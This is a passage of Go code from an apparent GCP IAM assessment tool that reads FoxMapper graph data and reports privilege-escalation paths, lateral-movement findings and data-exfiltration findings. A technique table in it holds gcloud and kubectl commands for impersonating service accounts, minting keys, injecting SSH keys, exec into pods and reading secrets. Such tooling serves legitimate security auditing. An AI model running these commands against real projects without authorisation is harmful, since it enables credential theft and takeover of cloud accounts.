`json:"resource"` + Conditions map[string]any `json:"conditions"` + ScopeLimited FlexibleBool `json:"scope_limited"` + ScopeWarning string `json:"scope_warning"` + ScopeBlocksEscalation FlexibleBool `json:"scope_blocks_escalation"` + ScopeAllowsMethods []string `json:"scope_allows_methods"` + Scopes []string `json:"scopes"` +} + +// Policy represents an IAM policy from FoxMapper graph +type Policy struct { + Resource string `json:"resource"` + Bindings []PolicyBinding `json:"bindings"` + Version int `json:"version"` +} + +// PolicyBinding represents a single IAM binding +type PolicyBinding struct { + Role string `json:"role"` + Members []string `json:"members"` + Condition map[string]any `json:"condition"` +} + +// GraphMetadata contains metadata about the FoxMapper graph +type GraphMetadata struct { + ProjectID string `json:"project_id"` + OrgID string `json:"org_id"` + CreatedAt string `json:"created_at"` + FoxMapperVersion string `json:"foxmapper_version"` +} + +// PrivescPath represents a privilege escalation path +type PrivescPath struct { + Source string + Destination string + Edges []Edge + HopCount int + AdminLevel string // org, folder, project + ScopeBlocked bool +} + +// FoxMapperService provides access to FoxMapper graph data +type FoxMapperService struct { + DataBasePath string + Nodes []Node + Edges []Edge + Policies []Policy + Metadata GraphMetadata + nodeMap map[string]*Node + graph graph.Graph[string, string] + initialized bool + + // Pre-computed findings from FoxMapper presets + LateralFindingsData *LateralFindingsFile // From lateral_findings.json + DataExfilFindingsData *DataExfilFindingsFile // From data_exfil_findings.json +} + +// LateralFindingsFile represents the wrapper for lateral_findings.json +type LateralFindingsFile struct { + ProjectID string `json:"project_id"` + TotalTechniquesAnalyzed int `json:"total_techniques_analyzed"` + TechniquesWithAccess int `json:"techniques_with_access"` + CategoriesSummary map[string]CategorySummary `json:"categories_summary"` + Findings []LateralFindingEntry `json:"findings"` +} + +// DataExfilFindingsFile represents the wrapper for data_exfil_findings.json +type DataExfilFindingsFile struct { + ProjectID string `json:"project_id"` + TotalTechniquesAnalyzed int `json:"total_techniques_analyzed"` + TechniquesWithAccess int `json:"techniques_with_access"` + PublicResources []string `json:"public_resources"` + ServicesSummary map[string]ServiceSummary `json:"services_summary"` + Findings []DataExfilFindingEntry `json:"findings"` +} + +// CategorySummary provides summary info for a lateral movement category +type CategorySummary struct { + Count int `json:"count"` + Description string `json:"description"` +} + +// ServiceSummary provides summary info for a data exfil service +type ServiceSummary struct { + Count int `json:"count"` + TotalPrincipals int `json:"total_principals"` + NonAdminPrincipals int `json:"non_admin_principals"` + ViaPrivesc int `json:"via_privesc"` + ResourceLevel int `json:"resource_level"` +} + +// LateralFindingEntry represents a single lateral movement finding +type LateralFindingEntry struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Category string `json:"category"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + PrincipalCount int `json:"principal_count"` + NonAdminCount int `json:"non_admin_count"` + ViaEdgeCount int `json:"via_edge_count"` + Principals []PrincipalAccessFile `json:"principals"` +} + +// DataExfilFindingEntry represents a single data exfil finding +type DataExfilFindingEntry struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Service string `json:"service"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + PrincipalCount int `json:"principal_count"` + NonAdminCount int `json:"non_admin_count"` + ViaEdgeCount int `json:"via_edge_count"` + Principals []PrincipalAccessFile `json:"principals"` +} + +// PrincipalAccessFile represents a principal with access from FoxMapper findings +type PrincipalAccessFile struct { + Principal string `json:"principal"` + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + IsAdmin bool `json:"is_admin"` + IsServiceAccount bool `json:"is_service_account"` + AccessType string `json:"access_type"` // direct, via_privesc + ViaEdge bool `json:"via_edge"` + EdgePath []string `json:"edge_path,omitempty"` + Resource string `json:"resource,omitempty"` +} + +// New creates a new FoxMapperService +func New() *FoxMapperService { + return &FoxMapperService{ + nodeMap: make(map[string]*Node), + } +} + +// generateFoxMapperDataBasePaths returns paths to check for FoxMapper data +// FoxMapper saves data with prefixes: org-{id}, proj-{id}, folder-{id} +func generateFoxMapperDataBasePaths(identifier string, isOrg bool) []string { + var paths []string + homeDir, err := os.UserHomeDir() + if err != nil { + return paths + } + + // Determine the prefixed identifier FoxMapper uses + // FoxMapper saves as: org-{id}, proj-{id}, folder-{id} + var prefixedIdentifiers []string + if isOrg { + prefixedIdentifiers = append(prefixedIdentifiers, "org-"+identifier) + } else { + prefixedIdentifiers = append(prefixedIdentifiers, "proj-"+identifier) + } + // Also try without prefix for backwards compatibility + prefixedIdentifiers = append(prefixedIdentifiers, identifier) + + gcpDir := "gcp" + + // Generate paths for each possible identifier format + for _, prefixedID := range prefixedIdentifiers { + // Platform-specific paths + if runtime.GOOS == "darwin" { + // macOS: ~/Library/Application Support/foxmapper/gcp/{id} + paths = append(paths, filepath.Join(homeDir, "Library", "Application Support", "foxmapper", gcpDir, prefixedID)) + } else if runtime.GOOS == "windows" { + // Windows: %APPDATA%/foxmapper/gcp/{id} + appData := os.Getenv("APPDATA") + if appData != "" { + paths = append(paths, filepath.Join(appData, "foxmapper", gcpDir, prefixedID)) + } + } + + // Linux/BSD and fallback for all platforms + // Check XDG_DATA_HOME first + xdgDataHome := os.Getenv("XDG_DATA_HOME") + if xdgDataHome != "" { + paths = append(paths, filepath.Join(xdgDataHome, "foxmapper", gcpDir, prefixedID)) + } + + // Default: ~/.local/share/foxmapper/gcp/{id} + paths = append(paths, filepath.Join(homeDir, ".local", "share", "foxmapper", gcpDir, prefixedID)) + } + + // Legacy pmapper paths (for backwards compatibility) - without prefix + if runtime.GOOS == "darwin" { + paths = append(paths, filepath.Join(homeDir, "Library", "Application Support", "com.nccgroup.principalmapper", identifier)) + } else { + xdgDataHome := os.Getenv("XDG_DATA_HOME") + if xdgDataHome != "" { + paths = append(paths, filepath.Join(xdgDataHome, "principalmapper", identifier)) + } + paths = append(paths, filepath.Join(homeDir, ".local", "share", "principalmapper", identifier)) + } + + return paths +} + +// LoadGraph loads FoxMapper graph data for an org or project +func (s *FoxMapperService) LoadGraph(identifier string, isOrg bool) error { + // Try to find FoxMapper data + var graphPath string + paths := generateFoxMapperDataBasePaths(identifier, isOrg) + + for _, path := range paths { + graphDir := filepath.Join(path, "graph") + nodesPath := filepath.Join(graphDir, "nodes.json") + if _, err := os.Stat(nodesPath); err == nil { + graphPath = path + break + } + } + + if graphPath == "" { + return fmt.Errorf("no FoxMapper data found for %s. Run 'foxmapper gcp graph create' first", identifier) + } + + return s.LoadGraphFromPath(graphPath) +} + +// LoadGraphFromPath loads FoxMapper graph from a specific path +func (s *FoxMapperService) LoadGraphFromPath(path string) error { + graphDir := filepath.Join(path, "graph") + + // Load nodes + nodesPath := filepath.Join(graphDir, "nodes.json") + nodesData, err := os.ReadFile(nodesPath) + if err != nil { + return fmt.Errorf("failed to read nodes.json: %w", err) + } + if err := json.Unmarshal(nodesData, &s.Nodes); err != nil { + return fmt.Errorf("failed to parse nodes.json: %w", err) + } + + // Build node map + for i := range s.Nodes { + s.nodeMap[s.Nodes[i].MemberID] = &s.Nodes[i] + // Also map by email for convenience + if s.Nodes[i].Email != "" { + s.nodeMap[s.Nodes[i].Email] = &s.Nodes[i] + } + } + + // Load edges + edgesPath := filepath.Join(graphDir, "edges.json") + edgesData, err := os.ReadFile(edgesPath) + if err != nil { + return fmt.Errorf("failed to read edges.json: %w", err) + } + if err := json.Unmarshal(edgesData, &s.Edges); err != nil { + return fmt.Errorf("failed to parse edges.json: %w", err) + } + + // Load policies (optional) + policiesPath := filepath.Join(graphDir, "policies.json") + if policiesData, err := os.ReadFile(policiesPath); err == nil { + json.Unmarshal(policiesData, &s.Policies) + } + + // Load metadata (optional) + metadataPath := filepath.Join(path, "metadata.json") + if metadataData, err := os.ReadFile(metadataPath); err == nil { + json.Unmarshal(metadataData, &s.Metadata) + } + + // Load pre-computed lateral movement findings (optional) + lateralPath := filepath.Join(graphDir, "lateral_findings.json") + if lateralData, err := os.ReadFile(lateralPath); err == nil { + var lateralFindings LateralFindingsFile + if json.Unmarshal(lateralData, &lateralFindings) == nil { + s.LateralFindingsData = &lateralFindings + } + } + + // Load pre-computed data exfil findings (optional) + dataExfilPath := filepath.Join(graphDir, "data_exfil_findings.json") + if dataExfilData, err := os.ReadFile(dataExfilPath); err == nil { + var dataExfilFindings DataExfilFindingsFile + if json.Unmarshal(dataExfilData, &dataExfilFindings) == nil { + s.DataExfilFindingsData = &dataExfilFindings + } + } + + // Build graph for path finding + s.buildGraph() + + // Compute path to admin for all nodes + s.computePathsToAdmin() + + s.initialized = true + return nil +} + +// MergeGraphFromPath merges another graph into this service +// Used to combine multiple project graphs into a single view +func (s *FoxMapperService) MergeGraphFromPath(path string) error { + graphDir := filepath.Join(path, "graph") + + // Load nodes from the other graph + nodesPath := filepath.Join(graphDir, "nodes.json") + nodesData, err := os.ReadFile(nodesPath) + if err != nil { + return fmt.Errorf("failed to read nodes.json: %w", err) + } + var otherNodes []Node + if err := json.Unmarshal(nodesData, &otherNodes); err != nil { + return fmt.Errorf("failed to parse nodes.json: %w", err) + } + + // Load edges from the other graph + edgesPath := filepath.Join(graphDir, "edges.json") + edgesData, err := os.ReadFile(edgesPath) + if err != nil { + return fmt.Errorf("failed to read edges.json: %w", err) + } + var otherEdges []Edge + if err := json.Unmarshal(edgesData, &otherEdges); err != nil { + return fmt.Errorf("failed to parse edges.json: %w", err) + } + + // Merge nodes (avoid duplicates by member_id) + existingNodes := make(map[string]bool) + for _, node := range s.Nodes { + existingNodes[node.MemberID] = true + } + for _, node := range otherNodes { + if !existingNodes[node.MemberID] { + s.Nodes = append(s.Nodes, node) + s.nodeMap[node.MemberID] = &s.Nodes[len(s.Nodes)-1] + if node.Email != "" { + s.nodeMap[node.Email] = &s.Nodes[len(s.Nodes)-1] + } + existingNodes[node.MemberID] = true + } + } + + // Merge edges (avoid duplicates by source+destination+short_reason) + type edgeKey struct { + source, dest, reason string + } + existingEdges := make(map[edgeKey]bool) + for _, edge := range s.Edges { + existingEdges[edgeKey{edge.Source, edge.Destination, edge.ShortReason}] = true + } + for _, edge := range otherEdges { + key := edgeKey{edge.Source, edge.Destination, edge.ShortReason} + if !existingEdges[key] { + s.Edges = append(s.Edges, edge) + existingEdges[key] = true + } + } + + // Load and merge policies (optional) + policiesPath := filepath.Join(graphDir, "policies.json") + if policiesData, err := os.ReadFile(policiesPath); err == nil { + var otherPolicies []Policy + if json.Unmarshal(policiesData, &otherPolicies) == nil { + // Simple append for policies - could dedupe by resource if needed + s.Policies = append(s.Policies, otherPolicies...) + } + } + + // Load and merge lateral findings (optional) + lateralPath := filepath.Join(graphDir, "lateral_findings.json") + if lateralData, err := os.ReadFile(lateralPath); err == nil { + var otherLateral LateralFindingsFile + if json.Unmarshal(lateralData, &otherLateral) == nil { + if s.LateralFindingsData == nil { + s.LateralFindingsData = &otherLateral + } else { + // Merge findings from both + s.LateralFindingsData.Findings = append(s.LateralFindingsData.Findings, otherLateral.Findings...) + s.LateralFindingsData.TechniquesWithAccess += otherLateral.TechniquesWithAccess + } + } + } + + // Load and merge data exfil findings (optional) + dataExfilPath := filepath.Join(graphDir, "data_exfil_findings.json") + if dataExfilData, err := os.ReadFile(dataExfilPath); err == nil { + var otherDataExfil DataExfilFindingsFile + if json.Unmarshal(dataExfilData, &otherDataExfil) == nil { + if s.DataExfilFindingsData == nil { + s.DataExfilFindingsData = &otherDataExfil + } else { + // Merge findings from both + s.DataExfilFindingsData.Findings = append(s.DataExfilFindingsData.Findings, otherDataExfil.Findings...) + s.DataExfilFindingsData.TechniquesWithAccess += otherDataExfil.TechniquesWithAccess + } + } + } + + return nil +} + +// RebuildAfterMerge rebuilds the in-memory graph and recomputes paths after merging +func (s *FoxMapperService) RebuildAfterMerge() { + s.buildGraph() + s.computePathsToAdmin() + s.initialized = true +} + +// buildGraph creates an in-memory graph for path finding +func (s *FoxMapperService) buildGraph() { + s.graph = graph.New(graph.StringHash, graph.Directed()) + + // Add all nodes as vertices + for _, node := range s.Nodes { + _ = s.graph.AddVertex(node.MemberID) + } + + // Add all edges + for _, edge := range s.Edges { + _ = s.graph.AddEdge( + edge.Source, + edge.Destination, + graph.EdgeAttribute("reason", edge.Reason), + graph.EdgeAttribute("short_reason", edge.ShortReason), + ) + } +} + +// computePathsToAdmin computes whether each node has a path to an admin node +func (s *FoxMapperService) computePathsToAdmin() { + adminNodes := s.GetAdminNodes() + + for i := range s.Nodes { + if s.Nodes[i].IsAdmin { + s.Nodes[i].PathToAdmin = true + s.Nodes[i].CanPrivEscToAdminString = "Admin" + s.Nodes[i].IsAdminString = "Yes" + } else { + hasPath := false + for _, admin := range adminNodes { + path, _ := graph.ShortestPath(s.graph, s.Nodes[i].MemberID, admin.MemberID) + if len(path) > 0 && s.Nodes[i].MemberID != admin.MemberID { + hasPath = true + break + } + } + s.Nodes[i].PathToAdmin = hasPath + if hasPath { + s.Nodes[i].CanPrivEscToAdminString = "Yes" + } else { + s.Nodes[i].CanPrivEscToAdminString = "No" + } + s.Nodes[i].IsAdminString = "No" + } + } +} + +// IsInitialized returns whether the graph has been loaded +func (s *FoxMapperService) IsInitialized() bool { + return s.initialized +} + +// GetNode returns a node by member_id or email +func (s *FoxMapperService) GetNode(identifier string) *Node { + // Try direct lookup + if node, ok := s.nodeMap[identifier]; ok { + return node + } + // Try with serviceAccount: prefix + if node, ok := s.nodeMap["serviceAccount:"+identifier]; ok { + return node + } + // Try with user: prefix + if node, ok := s.nodeMap["user:"+identifier]; ok { + return node + } + return nil +} + +// GetAdminNodes returns all admin nodes +func (s *FoxMapperService) GetAdminNodes() []*Node { + var admins []*Node + for i := range s.Nodes { + if s.Nodes[i].IsAdmin { + admins = append(admins, &s.Nodes[i]) + } + } + return admins +} + +// GetNodesWithPrivesc returns all nodes that can escalate to admin +func (s *FoxMapperService) GetNodesWithPrivesc() []*Node { + var nodes []*Node + for i := range s.Nodes { + if s.Nodes[i].PathToAdmin && !s.Nodes[i].IsAdmin { + nodes = append(nodes, &s.Nodes[i]) + } + } + return nodes +} + +// DoesPrincipalHavePathToAdmin checks if a principal can escalate to admin +func (s *FoxMapperService) DoesPrincipalHavePathToAdmin(principal string) bool { + node := s.GetNode(principal) + if node == nil { + return false + } + return node.PathToAdmin +} + +// IsPrincipalAdmin checks if a principal is an admin +func (s *FoxMapperService) IsPrincipalAdmin(principal string) bool { + node := s.GetNode(principal) + if node == nil { + return false + } + return node.IsAdmin +} + +// GetPrivescPaths returns all privesc paths for a principal +func (s *FoxMapperService) GetPrivescPaths(principal string) []PrivescPath { + node := s.GetNode(principal) + if node == nil { + return nil + } + + var paths []PrivescPath + adminNodes := s.GetAdminNodes() + + for _, admin := range adminNodes { + if node.MemberID == admin.MemberID { + continue + } + + shortestPath, _ := graph.ShortestPath(s.graph, node.MemberID, admin.MemberID) + if len(shortestPath) > 0 { + // Build edges for this path + var pathEdges []Edge + scopeBlocked := false + for i := 0; i < len(shortestPath)-1; i++ { + edge := s.findEdge(shortestPath[i], shortestPath[i+1]) + if edge != nil { + pathEdges = append(pathEdges, *edge) + if edge.ScopeBlocksEscalation { + scopeBlocked = true + } + } + } + + paths = append(paths, PrivescPath{ + Source: node.Email, + Destination: admin.Email, + Edges: pathEdges, + HopCount: len(pathEdges), + AdminLevel: admin.AdminLevel, + ScopeBlocked: scopeBlocked, + }) + } + } + + // Sort by hop count + sort.Slice(paths, func(i, j int) bool { + return paths[i].HopCount < paths[j].HopCount + }) + + return paths +} + +// findEdge finds an edge between two nodes +func (s *FoxMapperService) findEdge(source, dest string) *Edge { + for i := range s.Edges { + if s.Edges[i].Source == source && s.Edges[i].Destination == dest { + return &s.Edges[i] + } + } + return nil +} + +// GetAttackSummary returns a summary string like "Privesc/Exfil/Lateral" for a principal +// This is used by other modules to display attack path info +func (s *FoxMapperService) GetAttackSummary(principal string) string { + if !s.initialized { + return "No FoxMapper data" + } + + node := s.GetNode(principal) + if node == nil { + return "Unknown" + } + + if node.IsAdmin { + adminLevel := node.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + return fmt.Sprintf("Admin (%s)", adminLevel) + } + + if node.PathToAdmin { + paths := s.GetPrivescPaths(principal) + if len(paths) > 0 { + // Find the highest admin level reachable + highestLevel := "project" + shortestHops := paths[0].HopCount + for _, p := range paths { + if p.AdminLevel == "org" { + highestLevel = "org" + } else if p.AdminLevel == "folder" && highestLevel != "org" { + highestLevel = "folder" + } + } + return fmt.Sprintf("Privesc→%s (%d hops)", highestLevel, shortestHops) + } + return "Privesc" + } + + return "No" +} + +// GetPrivescSummary returns a summary of all privesc paths in the graph +func (s *FoxMapperService) GetPrivescSummary() map[string]interface{} { + totalNodes := len(s.Nodes) + adminNodes := len(s.GetAdminNodes()) + nodesWithPrivesc := len(s.GetNodesWithPrivesc()) + + // Count by admin level + orgAdmins := 0 + folderAdmins := 0 + projectAdmins := 0 + for _, node := range s.Nodes { + if node.IsAdmin { + switch node.AdminLevel { + case "org": + orgAdmins++ + case "folder": + folderAdmins++ + case "project": + projectAdmins++ + default: + projectAdmins++ + } + } + } + + // Count by principal type + saWithPrivesc := 0 + userWithPrivesc := 0 + for _, node := range s.GetNodesWithPrivesc() { + if node.MemberType == "serviceAccount" { + saWithPrivesc++ + } else if node.MemberType == "user" { + userWithPrivesc++ + } + } + + return map[string]interface{}{ + "total_nodes": totalNodes, + "admin_nodes": adminNodes, + "non_admin_nodes": totalNodes - adminNodes, + "nodes_with_privesc": nodesWithPrivesc, + "org_admins": orgAdmins, + "folder_admins": folderAdmins, + "project_admins": projectAdmins, + "sa_with_privesc": saWithPrivesc, + "user_with_privesc": userWithPrivesc, + "percent_with_privesc": float64(nodesWithPrivesc) / float64(totalNodes-adminNodes) * 100, + } +} + +// FormatPrivescPath formats a privesc path for display +func FormatPrivescPath(path PrivescPath) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("%s → %s (%d hops)\n", path.Source, path.Destination, path.HopCount)) + for i, edge := range path.Edges { + scopeInfo := "" + if edge.ScopeBlocksEscalation { + scopeInfo = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + scopeInfo = " [scope-limited]" + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, scopeInfo)) + } + return sb.String() +} + +// GetEdgesFrom returns all edges from a given node +func (s *FoxMapperService) GetEdgesFrom(principal string) []Edge { + var edges []Edge + node := s.GetNode(principal) + if node == nil { + return edges + } + + for _, edge := range s.Edges { + if edge.Source == node.MemberID { + edges = append(edges, edge) + } + } + return edges +} + +// GetEdgesTo returns all edges to a given node +func (s *FoxMapperService) GetEdgesTo(principal string) []Edge { + var edges []Edge + node := s.GetNode(principal) + if node == nil { + return edges + } + + for _, edge := range s.Edges { + if edge.Destination == node.MemberID { + edges = append(edges, edge) + } + } + return edges +} + +// FindFoxMapperData searches for FoxMapper data and returns the path if found +func FindFoxMapperData(identifier string, isOrg bool) (string, error) { + paths := generateFoxMapperDataBasePaths(identifier, isOrg) + + for _, path := range paths { + graphDir := filepath.Join(path, "graph") + nodesPath := filepath.Join(graphDir, "nodes.json") + if _, err := os.Stat(nodesPath); err == nil { + return path, nil + } + } + + return "", fmt.Errorf("no FoxMapper data found for %s", identifier) +} + +// GetServiceAccountNodes returns all service account nodes +func (s *FoxMapperService) GetServiceAccountNodes() []*Node { + var nodes []*Node + for i := range s.Nodes { + if s.Nodes[i].MemberType == "serviceAccount" { + nodes = append(nodes, &s.Nodes[i]) + } + } + return nodes +} + +// ========================================== +// FoxMapper Preset Execution Support +// ========================================== + +// PresetResult represents the result of running a FoxMapper preset +type PresetResult struct { + Preset string `json:"preset"` + ProjectID string `json:"project_id"` + TotalFindings int `json:"total_findings"` + Findings []PresetFinding `json:"findings"` + Summary map[string]interface{} `json:"summary"` + CategoriesSummary map[string]CategoryInfo `json:"categories_summary"` +} + +// PresetFinding represents a single finding from a preset +type PresetFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Category string `json:"category"` + Service string `json:"service,omitempty"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + PrincipalCount int `json:"principal_count"` + NonAdminCount int `json:"non_admin_count"` + ViaEdgeCount int `json:"via_edge_count,omitempty"` + Principals []PrincipalAccess `json:"principals"` + Resources []string `json:"resources_with_access,omitempty"` +} + +// PrincipalAccess represents a principal with access to a technique +type PrincipalAccess struct { + Principal string `json:"principal"` + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + IsAdmin bool `json:"is_admin"` + IsServiceAccount bool `json:"is_service_account"` + AccessType string `json:"access_type"` // project_iam, resource_iam, via_privesc + ViaEdge bool `json:"via_edge"` + EdgePath []string `json:"edge_path,omitempty"` + HasCondition bool `json:"has_condition"` +} + +// CategoryInfo provides summary info for a category +type CategoryInfo struct { + Count int `json:"count"` + Description string `json:"description"` +} + +// PrivescFinding represents a privilege escalation finding +type PrivescFinding struct { + Principal string `json:"principal"` + MemberType string `json:"member_type"` + IsAdmin bool `json:"is_admin"` + CanEscalate bool `json:"can_escalate"` + HighestAdminLevel string `json:"highest_admin_level"` // org, folder, project + HighestReachableTarget string `json:"highest_reachable_target"` // The admin principal that can be reached + HighestReachableProject string `json:"highest_reachable_project"` // The project of the highest reachable admin + ViablePathCount int `json:"viable_path_count"` + ScopeBlockedCount int `json:"scope_blocked_count"` + PathsToOrgAdmin int `json:"paths_to_org_admin"` + PathsToFolderAdmin int `json:"paths_to_folder_admin"` + PathsToProjectAdmin int `json:"paths_to_project_admin"` + ShortestPathHops int `json:"shortest_path_hops"` + Paths []PrivescPath `json:"paths,omitempty"` +} + +// AnalyzePrivesc analyzes privilege escalation using graph data +// This is equivalent to running "foxmapper gcp query preset privesc" +func (s *FoxMapperService) AnalyzePrivesc() []PrivescFinding { + if !s.initialized { + return nil + } + + var findings []PrivescFinding + + for i := range s.Nodes { + node := &s.Nodes[i] + + finding := PrivescFinding{ + Principal: node.Email, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + } + + if node.IsAdmin { + finding.HighestAdminLevel = node.AdminLevel + if finding.HighestAdminLevel == "" { + finding.HighestAdminLevel = "project" + } + // For admins, they are their own "target" + finding.HighestReachableTarget = node.Email + finding.HighestReachableProject = node.ProjectID + } else if node.PathToAdmin { + finding.CanEscalate = true + paths := s.GetPrivescPaths(node.MemberID) + finding.Paths = paths + + // Track the best path (highest level, shortest hops) + var bestPath *PrivescPath + + // Analyze paths + for idx := range paths { + path := &paths[idx] + if path.ScopeBlocked { + finding.ScopeBlockedCount++ + } else { + finding.ViablePathCount++ + } + + // Track admin level and update best path + switch path.AdminLevel { + case "org": + finding.PathsToOrgAdmin++ + if finding.HighestAdminLevel != "org" { + finding.HighestAdminLevel = "org" + bestPath = path + } else if bestPath != nil && path.HopCount < bestPath.HopCount { + bestPath = path + } + case "folder": + finding.PathsToFolderAdmin++ + if finding.HighestAdminLevel == "" || finding.HighestAdminLevel == "project" { + finding.HighestAdminLevel = "folder" + bestPath = path + } else if finding.HighestAdminLevel == "folder" && (bestPath == nil || path.HopCount < bestPath.HopCount) { + bestPath = path + } + case "project": + finding.PathsToProjectAdmin++ + if finding.HighestAdminLevel == "" { + finding.HighestAdminLevel = "project" + bestPath = path + } else if finding.HighestAdminLevel == "project" && (bestPath == nil || path.HopCount < bestPath.HopCount) { + bestPath = path + } + } + + // Track shortest path + if finding.ShortestPathHops == 0 || path.HopCount < finding.ShortestPathHops { + finding.ShortestPathHops = path.HopCount + } + } + + // Set the highest reachable target info + if bestPath != nil { + finding.HighestReachableTarget = bestPath.Destination + // Try to get project info from the destination node + destNode := s.GetNode(bestPath.Destination) + if destNode != nil { + finding.HighestReachableProject = destNode.ProjectID + } + } + } + + // Only include principals with privesc potential or admins + if finding.IsAdmin || finding.CanEscalate { + findings = append(findings, finding) + } + } + + return findings +} + +// LateralFinding represents a lateral movement technique finding +type LateralFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Category string `json:"category"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + Principals []PrincipalAccess `json:"principals"` +} + +// LateralTechnique defines a lateral movement technique +type LateralTechnique struct { + Permission string + Description string + Exploitation string + Category string +} + +// GetLateralTechniques returns all lateral movement techniques +func GetLateralTechniques() map[string]LateralTechnique { + return map[string]LateralTechnique{ + // Service Account Impersonation + "sa_token_creator": { + Permission: "iam.serviceAccounts.getAccessToken", + Description: "Can get access tokens for service accounts", + Exploitation: "gcloud auth print-access-token --impersonate-service-account=SA_EMAIL", + Category: "sa_impersonation", + }, + "sa_key_creator": { + Permission: "iam.serviceAccountKeys.create", + Description: "Can create keys for service accounts", + Exploitation: "gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL", + Category: "sa_impersonation", + }, + "sa_sign_blob": { + Permission: "iam.serviceAccounts.signBlob", + Description: "Can sign blobs as service account", + Exploitation: "gcloud iam service-accounts sign-blob --iam-account=SA_EMAIL input.txt output.txt", + Category: "sa_impersonation", + }, + "sa_sign_jwt": { + Permission: "iam.serviceAccounts.signJwt", + Description: "Can sign JWTs as service account", + Exploitation: "# Sign JWT to impersonate SA", + Category: "sa_impersonation", + }, + "sa_openid_token": { + Permission: "iam.serviceAccounts.getOpenIdToken", + Description: "Can get OpenID tokens for service accounts", + Exploitation: "gcloud auth print-identity-token --impersonate-service-account=SA_EMAIL", + Category: "sa_impersonation", + }, + // Compute Access + "compute_ssh_oslogin": { + Permission: "compute.instances.osLogin", + Description: "Can SSH to compute instances via OS Login", + Exploitation: "gcloud compute ssh INSTANCE_NAME --zone=ZONE", + Category: "compute_access", + }, + "compute_set_metadata": { + Permission: "compute.instances.setMetadata", + Description: "Can inject SSH keys via instance metadata", + Exploitation: "gcloud compute instances add-metadata INSTANCE --metadata=ssh-keys=\"user:SSH_KEY\"", + Category: "compute_access", + }, + "compute_set_project_metadata": { + Permission: "compute.projects.setCommonInstanceMetadata", + Description: "Can inject SSH keys via project metadata", + Exploitation: "gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:SSH_KEY\"", + Category: "compute_access", + }, + "compute_serial_port": { + Permission: "compute.instances.getSerialPortOutput", + Description: "Can read serial port output (may leak data)", + Exploitation: "gcloud compute instances get-serial-port-output INSTANCE --zone=ZONE", + Category: "compute_access", + }, + // GKE Access + "gke_get_credentials": { + Permission: "container.clusters.getCredentials", + Description: "Can get GKE cluster credentials", + Exploitation: "gcloud container clusters get-credentials CLUSTER --zone=ZONE", + Category: "gke_access", + }, + "gke_pod_exec": { + Permission: "container.pods.exec", + Description: "Can exec into GKE pods", + Exploitation: "kubectl exec -it POD -- /bin/sh", + Category: "gke_access", + }, + "gke_pod_attach": { + Permission: "container.pods.attach", + Description: "Can attach to GKE pods", + Exploitation: "kubectl attach -it POD", + Category: "gke_access", + }, + // Cloud Functions + "functions_create": { + Permission: "cloudfunctions.functions.create", + Description: "Can create Cloud Functions with any SA", + Exploitation: "gcloud functions deploy FUNC --runtime=python311 --service-account=SA_EMAIL", + Category: "serverless", + }, + "functions_update": { + Permission: "cloudfunctions.functions.update", + Description: "Can update Cloud Functions to change SA or code", + Exploitation: "gcloud functions deploy FUNC --service-account=SA_EMAIL", + Category: "serverless", + }, + // Cloud Run + "run_create": { + Permission: "run.services.create", + Description: "Can create Cloud Run services with any SA", + Exploitation: "gcloud run deploy SERVICE --image=IMAGE --service-account=SA_EMAIL", + Category: "serverless", + }, + "run_update": { + Permission: "run.services.update", + Description: "Can update Cloud Run services to change SA", + Exploitation: "gcloud run services update SERVICE --service-account=SA_EMAIL", + Category: "serverless", + }, + // Secrets + "secret_access": { + Permission: "secretmanager.versions.access", + Description: "Can access secret values", + Exploitation: "gcloud secrets versions access latest --secret=SECRET_NAME", + Category: "secrets", + }, + } +} + +// AnalyzeLateral analyzes lateral movement opportunities using graph data +// This is equivalent to running "foxmapper gcp query preset lateral" +// If pre-computed findings exist (lateral_findings.json), uses those. +// Otherwise falls back to edge-based analysis. +func (s *FoxMapperService) AnalyzeLateral(category string) []LateralFinding { + if !s.initialized { + return nil + } + + // Use pre-computed findings from FoxMapper if available + if s.LateralFindingsData != nil && len(s.LateralFindingsData.Findings) > 0 { + return s.analyzeLateralFromFindings(category) + } + + // Fallback to edge-based analysis (legacy behavior) + return s.analyzeLateralFromEdges(category) +} + +// analyzeLateralFromFindings uses pre-computed findings from lateral_findings.json +func (s *FoxMapperService) analyzeLateralFromFindings(category string) []LateralFinding { + var findings []LateralFinding + + for _, f := range s.LateralFindingsData.Findings { + // Filter by category if specified + if category != "" && f.Category != category { + continue + } + + // Convert file format to internal format + var principals []PrincipalAccess + for _, p := range f.Principals { + principals = append(principals, PrincipalAccess{ + Principal: p.Principal, + MemberID: p.MemberID, + MemberType: p.MemberType, + IsAdmin: p.IsAdmin, + IsServiceAccount: p.IsServiceAccount, + AccessType: p.AccessType, + ViaEdge: p.ViaEdge, + EdgePath: p.EdgePath, + }) + } + + if len(principals) > 0 { + findings = append(findings, LateralFinding{ + Technique: f.Technique, + Permission: f.Permission, + Category: f.Category, + Description: f.Description, + Exploitation: f.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// analyzeLateralFromEdges is the legacy edge-based analysis (fallback) +func (s *FoxMapperService) analyzeLateralFromEdges(category string) []LateralFinding { + var findings []LateralFinding + techniques := GetLateralTechniques() + + for name, tech := range techniques { + // Filter by category if specified + if category != "" && tech.Category != category { + continue + } + + // Find principals with this permission via edges + var principals []PrincipalAccess + for _, edge := range s.Edges { + // Check if edge grants this permission + if strings.Contains(strings.ToLower(edge.Reason), strings.ToLower(tech.Permission)) || + strings.Contains(edge.ShortReason, tech.Permission) { + node := s.GetNode(edge.Source) + if node != nil { + principals = append(principals, PrincipalAccess{ + Principal: node.Email, + MemberID: node.MemberID, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + IsServiceAccount: node.MemberType == 